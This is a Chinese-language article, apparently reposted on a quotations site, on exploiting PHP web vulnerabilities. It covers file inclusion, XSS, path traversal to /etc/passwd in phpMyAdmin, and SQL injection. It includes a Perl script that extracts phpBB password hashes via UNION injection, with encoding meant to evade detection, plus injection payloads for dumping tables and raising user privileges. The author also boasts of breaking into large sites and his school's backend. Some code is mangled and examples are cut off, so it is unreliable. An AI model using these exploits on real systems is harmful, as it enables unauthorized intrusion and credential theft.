當前位置:名人名言大全網 - 短信平臺 - php頁面漏洞分析及相關問題解決

php頁面漏洞分析及相關問題解決

從現在的網絡安全來看,大家最關註和接觸最多的WEB頁面漏洞應該是ASP了,在這方面,小竹是專家,我沒發言權。然而在PHP方面來看,也同樣存在很嚴重的安全問題,但是這方面的文章卻不多。在這裏,就跟大家來稍微的討論壹下PHP頁面的相關漏洞吧。

我對目前常見的PHP漏洞做了壹下總結,大致分為以下幾種:包含文件漏洞,腳本命令執行漏洞,文件泄露漏洞,SQL註入漏洞等幾種。當然,至於COOKIE欺騙等壹部分通用的技術就不在這裏討論了,這些資料網上也很多。那麽,我們就壹個壹個來分析壹下怎樣利用這些漏洞吧!

首先,我們來討論包含文件漏洞。這個漏洞應該說是PHP獨有的吧。這是由於不充分處理外部提供的惡意數據,從而導致遠程攻擊者可以利用這些漏洞以WEB進程權限在系統上執行任意命令。我們來看壹個例子:假設在a.php中有這樣壹句代碼:

以下是引用片段:

include($include."/xxx.php");

在這段代碼中,$include壹般是壹個已經設置好的路徑,但是我們可以通過自己構造壹個路徑來達到攻擊的目的。比方說我們提交:a.php?include=

接著,我們再來看壹下腳本命令執行漏洞。這是由於對用戶提交的URI參數缺少充分過濾,提交包含惡意HTML代碼的數據,可導致觸發跨站腳本攻擊,可能獲得目標用戶的敏感信息。我們也舉個例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁面對PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達到攻擊的目的

再然後,我們就來看看文件泄露漏洞了,這種漏洞是由於對用戶提交參數缺少充分過濾,遠程攻擊者可以利用它進行目錄遍歷攻擊以及獲取壹些敏感信息。我們拿最近發現的phpMyAdmin來做例子。在phpMyAdmin中,export.php頁面沒有對用戶提交的'what'參數進行充分過濾,遠程攻擊者提交包含多個'../'字符的數據,便可繞過WEB ROOT限制,以WEB權限查看系統上的任意文件信息。比方說打入這樣壹個地址:export.php?what=../../../../../../etc/passwd%00 就可以達到文件泄露的目的了。在這方面相對多壹點,有:myPHPNuke,McNews等等。

最後,我們又要回到最興奮的地方了。想想我們平時在asp頁面中用SQL註入有多麽爽,以前還要手動註入,壹直到小竹悟出"SQL註入密笈"(嘿嘿),然後再開做出NBSI以後,我們NB聯盟真是拉出壹片天空。曾先後幫CSDN,大富翁論壇,中國頻道等大型網站找出漏洞。(這些廢話不多說了,有點跑題了...)。

還是言規正傳,其實在asp中SQL的註入和php中的SQL註入大致相同,只不過稍微註意壹下用的幾個函數就好了。將asc改成ASCII,len改成LENGTH,其他函數基本不變了。其實大家看到PHP的SQL註入,是不是都會想到PHP-NUKE和PHPBB呢?不錯,俗話說樹大招分,像動網這樣的論壇在asp界就該是漏洞這王了,這並不是說它的論壇安全太差,而是名氣太響,別人用的多了,研究的人也就多了,發現的安全漏洞也就越多了。PHPBB也是壹樣的,現在很大壹部分人用PHP做論壇的話,壹般都是選擇了PHPBB。它的漏洞也是壹直在出,從最早 phpBB 1.4.0版本被人發現漏洞,到現在最近的phpBB 2.0.6版本的groupcp.php,,以及之前發現的search.php,profile.php,viewtopic.php等等加起來,大概也有十來個樣子吧。這也壹直導致,壹部分人在研究php漏洞的時候都會拿它做實驗品,所謂百練成精嘛,相信以後的PHPBB會越來越好。

好了,我們還是來分析壹下漏洞產生的原因吧。拿viewtopic.php頁面來說,由於在調用viewtopic.php時,直接從GET請求中獲得"topic_id"並傳遞給SQL查詢命令,而並沒有進行壹些過濾的處理,攻擊者可以提交特殊的SQL字符串用於獲得MD5密碼,獲得此密碼信息可以用於自動登錄或者進行暴力破解。(我想應該不會有人想去暴力破解吧,除非有特別重要的原因)。先看壹下相關源代碼:

以下是引用片段:

#

 if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))

#

 {

#

 $topic_id=intval($HTTP_GET_VARS[POST_TOPIC_URL]);

#

 }

#

 elseif(isset($HTTP_GET_VARS['topic']))

#

 {

#

 $topic_id=intval($HTTP_GET_VARS['topic']);

#

 }

從上面我們可以看出,如果提交的view=newest並且sid設置了值的話,執行的查詢代碼像下面的這個樣子(如果妳還沒看過PHPBB源代碼的話,建議妳看了再對著這裏來看,受影響系統為:phpBB 2.0.5和phpBB 2.0.4)。

以下是引用片段:

#

$sql = "SELECT p.post_id

#

FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u

#

WHERE s.session_id = '$session_id'

#

AND u.user_id = s.session_user_id

#

AND p.topic_id = $topic_id

#

AND p.post_time = u.user_lastvisit

#

ORDER BY p.post_time ASC

#

LIMIT 1";

Rick提供了下面的這斷測試代碼:

use IO::Socket;

$remote = shift || 'localhost';

$view_topic = shift || '/phpBB2/viewtopic.php';

$uid = shift || 2;

$port = 80;

$dBType = 'mysql4';

# mysql4 or pgsql

print "Trying to get password hash for uid $uid server $remote dbtype: $dBType ";

$p = "";

for($index=1; $index=32; $index++)

{

$socket = IO::Socket::INET-new(PeerAddr = $remote,

PeerPort = $port,

Proto = "tcp",

Type = SOCK_STREAM)

or die "Couldnt connect to $remote:$port : $@ ";

$str = "GET $view_topic" . "?sid=1topic_id=-1" . random_encode(make_dbsql()) . "view=newest" . " HTTP/1.0 ";

print $socket $str;

print $socket "Cookie: phpBB2mysql_sid=1 ";

# replace this for pgsql or remove it

print $socket "Host: $remote ";

while ($answer = $socket)

{

if ($answer =~ /location:.*x23(d+)/) # Matches the location: viewtopic.php?p=#

{

$p .= chr ();

}

}

close($socket);

}

print " MD5 Hash for uid $uid is $p ";

# random encode str. helps avoid detection

sub random_encode

{

$str = shift;

$ret = "";

for($i=0; $i

{

$c = substr($str,$i,1);

$j = rand length($str) * 1000;

if (int($j) % 2 || $c eq ' ')

{

$ret .= "%" . sprintf("%x",ord($c));

}

#p#副標題#e#

else

{

$ret .= $c;

}

}

return $ret;

}

sub make_dbsql

{

if ($dBType eq 'mysql4')

{

return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;

} elsif ($dBType eq 'pgsql')

{

return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";

}

else

{

return "";

}

}

這段代碼,我就不多做解釋了.作用是獲得HASH值.

看到這裏,大家可能有點疑問,為什麽我前面講的那些改的函數怎麽沒有用到,我講出來不怕大家笑話:其實網上很多站點有些頁面的查詢語句看起來會是這樣:

display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc

不要笑,這是真的,我還靠這個進過幾個大型網站.至於哪壹些,不好講出來,不過我們學校的網站,我就是靠這個進後臺的,把前面那函數用上吧.不然妳只有改人家的密碼了哦!!!

差點忘了壹點,在SQL註入的時候,PHP與ASP有所不同,mysql對sql語句的運用沒有mssql靈活,因此,很多在mssql上可以用的查詢語句在mysql中都不能奏效了. 壹般我們常見的註入語句像這樣:aaa.php?id=a' into outfile 'pass.txt或是aaa.php?id=a' into outfile 'pass.txt' /*再進壹步可以改成:aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt

這樣可以將數據庫數據導出為文件,然後可以查看.

或是這樣:mode=',user_level='4

這個語句壹般用在修改資料時,假設頁面存在漏洞的話,就可以達到提升權限的做用.

其它的如' OR 1=1 -- 或者:1' or 1='1則跟asp差不多.這裏不多講了.在php裏面,SQL註入看來還是漏洞之首啊,有太多的頁面存在這個問題了.

其實大家可以看出來,上面那些分類歸根結底只有壹個原因:提交參數沒過濾或是過濾不夠嚴謹.

#p#副標題#e#